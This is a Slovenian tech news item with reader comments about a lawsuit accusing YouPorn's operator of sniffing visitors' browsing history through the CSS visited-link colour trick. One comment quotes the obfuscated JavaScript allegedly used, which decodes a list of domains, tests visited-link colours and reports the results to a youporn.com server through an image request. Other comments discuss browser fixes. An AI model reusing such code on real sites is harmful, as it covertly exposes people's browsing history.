» »

Tožba zoper YouPorn zaradi vohljanja za obiskovalci

Tožba zoper YouPorn zaradi vohljanja za obiskovalci

Ars Technica - V Kaliforniji sta David Pitner in Jared Reagan vložila tožbo (PDF-datoteka) zoper nizozemsko podjetje Midstream Media International, ki vzdržuje portal YouPorn in njegove tematsko bolj specializirane sorodnike. Stran YouPorn zlorablja ranljivost v JavaScriptu, ki omogoča obiskani strani preveriti, ali je obiskovalec že obiskal neko točno določeno tretjo stran. To stori z zlorabo funkcije, ki že obiskane povezave obarva z drugo barvo (običajno vijoličasto namesto modro).

Podjetju v tožbi očitajo nedovoljen dostop do uporabnikove zgodovine brskanja, kar krši obiskovalčevo zasebnost in kalifornijske zakone. Dodajajo, da se je YouPorn celo potrudil nekoliko zakriti svoje početje, tako da so očitno zelo dobro seznanjeni z njegovo nelegalnostjo. YouPorn seveda ni edini, ki se loteva takšne prakse, saj tudi kopica drugih strani, takšnih čisto spodobnih in moralno neoporečnih, podobno vohlja za uporabnikovo zgodovino.

20 komentarjev

popster ::

ja ben, pa naj vejo še to. Sej ni nek zelo oseben podatek...

kako doseči anonimsnost na spletu

Machiavelli ::

V novici manjka da se mozila firefox trudi proti tem zadevam ;)
Nigaaazz

Pyr0Beast ::

Ahehehaha. Kaka luštna skripta.

<script type="text/javascript">
function ypol(){var k={0:"qpsoivc/dpn",1:"sfeuvcf/dpn",2:"bevmugsjfoegjoefs/dpn",3:
"ywjefpt/dpn",4:"uvcf9/dpn",5:"yoyy/dpn",6:"nfhbqpso/dpn",7:"nfhbspujd/dpn",8:
"yibntufs/dpn",9:"bxfnqjsf/dpn",10:"sfbmjuzljoht/dpn",11:"csb{{fst/dpn",12:
"yuvcf/dpn",13:"cbohcspt2/dpn",14:"gmjoh/dpn",15:"gsffpoft/dpn",16:
"nzgsffqbztjuf/dpn",17:"efcpobjscmph/dpn",18:"qbztfswf/dpn",19:"nbyqpso/dpn",20:
"wjefpt{/dpn",21:"bfco/ofu",22:"qpsopsbnb/dpn"};var g=[];for(var m in k)
{var d=k[m];var a="";for(var f=0;f<d.length;f++)
{a+=String.fromCharCode(d.charCodeAt(f)-1)}var h=false;for(var j in
{"http://":"","http://www.":""}){var l=document.createElement("a");
l.href=j+a;document.getElementById("ol").appendChild(l);var e="";
if(navigator.appName.indexOf("Microsoft")!=-1){e=l.currentStyle.color}
else{e=document.defaultView.getComputedStyle(l,null).getPropertyValue("color")}
if(e=="rgb(12, 34, 56)"||e=="rgb(12,34,56)"){h=true}}if(h){g.push(m)}}
var b=(g instanceof Array)?g.join(","):"";var c=document.createElement("img");
c.src="http://ol.youporn.com/blank.gif?id="+b;
document.getElementById("ol").appendChild(c)}ypol();
</script>


That list of gibberish contains the sites that YouPorn is checking to see if you’ve visited, but disguises them with a bit o’ simple cryptography. Dial back each letter by one, so “qpsoivc/dpn”, for example, becomes “pornhub.com.”
Some nanoparticles are more equal than others

Good work: Any notion of sanity and critical thought is off-topic in this place

Zgodovina sprememb…

KaRkY ::

In potem vklopiš porn mode na brskalniku pa je to to pa nimaš obiskanih strani:)
When you look long into an abyss, the abyss looks into you

OttoParts ::

In Soviet Russia (or Netherlands) porn is watching YOU! :))

Izi ::

Večina strani se trudi delati nekaj podobnega in še nisem slišal za kakšno tožbo, ko pa gre za porn pa je treba takoj tožiti :P

MrStein ::

Kaj je to v Firefox 3.6.12 pofiksano ali ni?
Motiti se je človeško.
Motiti se pogosto je neumno.
Vztrajati pri zmoti je... oh, pozdravljen!

techfreak :) ::

Lahko preizkusiš sam: http://wtikay.com/top5k

Machiavelli ::

MrStein je izjavil:

Kaj je to v Firefox 3.6.12 pofiksano ali ni?


OG
Prav zaradi tega je ta sistem zlahka zlorabiti, tako da stran "zahteva" od brskalnika, kakšne barva se bo uporabljala za različne povezave, s čemer se z lahkoto odkriva zgodovina obiskanih strani. Podobne prakse uporabljajo tudi številna druga podjetja, prav zaradi tega so se pri Mozilli odločili za drastične ukrepe za preprečevanje takšne zlorabe podatkov, ki so shranjeni v brskalnikih.

Katera verzija nebi znal povedat...najbrž vsaka novejša..
Na tem testu ki si ga dal od mojih biljon strani zazna samo you tube in twiter...Opera zadnja OG verzija...
Nigaaazz

techfreak :) ::

Opera 11 beta pušča. Sveža namestitev, obiščem /., Amazon, Google, MSN, Yahoo in YouTube, seveda mi stran na zgornjem linku vse najde. Ne samo to, najde tudi tiste, ki jih nisem obiskal in so v Speed Dialu (v mojem primeru Facebook).

Najnovejši verziji Safarija in Chrome-a pa sta v redu.

MrStein ::

FF 3.6.12 očitno pušča, po http://wtikay.com/top5k sodeč
IE8 tudi, Opera pa ne.
Motiti se je človeško.
Motiti se pogosto je neumno.
Vztrajati pri zmoti je... oh, pozdravljen!

techfreak :) ::

Katera Opera?


11 beta, build 1111, Opera/9.80 (Macintosh; Intel Mac OS X 10.5.8; U; en) Presto/2.7.39 Version/11.00

Zgodovina sprememb…

Machiavelli ::

OG 10.63 spusti samo you tube in twiter od biljon obiskanih strani :)
Nigaaazz

Zorro ::

zoom, če prav zastopim, ta stran preverja samo dostop do 5.000 najbolj popularnih, ki so jih oni uvrstili na seznam.

MrStein ::

techfreak :) je izjavil:

Katera Opera?

Zadnji release: 10.63 (Windows XP)

Hmm, zdaj pa najde obiskane strani. Čudno.
Motiti se je človeško.
Motiti se pogosto je neumno.
Vztrajati pri zmoti je... oh, pozdravljen!

Zgodovina sprememb…

  • spremenil: MrStein ()

Machiavelli ::

če ma omejeno na samo 5K strani tale test potlej ni tak zanesljiv...
Baje bojo zdaj hekerji ovirali stran Amazon...
Nigaaazz

MrStein ::

Malo nižje imaš link za 20k strani. (na levi, v meniju)
Motiti se je človeško.
Motiti se pogosto je neumno.
Vztrajati pri zmoti je... oh, pozdravljen!

Zorro ::

Sem poizkusil varianto z 20k pa mi je vrglo ven 31 strani za Firefox, za IE 8 pa 0.

Zorro ::

Vohljanje za zgodovino brskanja se da v Firefoxu preprečiti s tem, da se vrednost za layout.css.visited_links_enabled spremeni v false.

Izi ::

Testiral Firefox 4.0b7, po predhodnem brskanju po vseh omenjenih straneh, in na 5000 in na 20000 ni našel prav ničesar.
In glede varnosti ni nič kaj posebno nastavljeno vse je na default.


Vredno ogleda ...

TemaSporočilaOglediZadnje sporočilo
TemaSporočilaOglediZadnje sporočilo
»

Pornhub s HTTPS protokolom nad požrešne ISP-je (strani: 1 2 )

Oddelek: Novice / Zasebnost
5822065 (10722) M.B.
»

Consortium vdrl v strežnike Digital Playgrounda

Oddelek: Novice / Varnost
164993 (3700) gruntfürmich
»

Vdor v YouPorn razkriva tisoče gesel

Oddelek: Novice / Varnost
228713 (5370) energetik
»

Porno giganti nenavdušeni nad režimom .xxx domen

Oddelek: Novice / Omrežja / internet
2110574 (8497) Jeronimo
»

RedTube ne predstavlja nelojalne konkurence plačljivim pornografskim stranem

Oddelek: Novice / Tožbe
1812037 (9726) FireSnake

Več podobnih tem